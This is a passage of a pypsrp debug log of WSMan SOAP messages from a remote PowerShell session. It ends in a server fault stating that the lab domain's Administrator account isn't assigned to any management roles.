Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">True</wsman:Option></wsman:OptionSet>wsman:SelectorSet<wsman:Selector Name="ShellId">0BD71E4F-89AD-4C4C-8A64-8888BB4D02F5</wsman:Selector></wsman:SelectorSet></s:Header><s:Body>rsp:Receiversp:DesiredStreamstdout</rsp:DesiredStream></rsp:Receive></s:Body></s:Envelope>' 2021-08-21 21:15:54,608 - pypsrp.wsman - DEBUG - Received message: <s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:e="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.dmtf.org/wbem/wsman/1/wsman/fault</a:Action><a:MessageID>uuid:C8BE6F00-8511-4336-BD88-59C109999977</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:9AA5D31F-5A08-474B-9A3B-30366DEC2883</a:RelatesTo></s:Header><s:Body><s:Fault><s:Code><s:Value>s:Receiver</s:Value><s:Subcode><s:Value>w:InternalError</s:Value></s:Subcode></s:Code><s:Reason><s:Text xml:lang="en-US"></s:Text></s:Reason><s:Detail><f:WSManFault xmlns:f="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" Code="2152992672" Machine="10.0.0.202"><f:Message><f:ProviderFault provider="PowerShellplugin" path="%windir%\system32\pwrshplugin.dll">[AuthZRequestId=3dc9559a-1713-450c-b832-6978fa1329a6][FailureCategory=AuthZ-CmdletAccessDeniedException] The user "adlab.local/Users/Administrator" isn't assigned to any management roles.</f:ProviderFault></f:Message></f:WSManFault></s:Detail></s:Fault></s:Body></s:Envelope>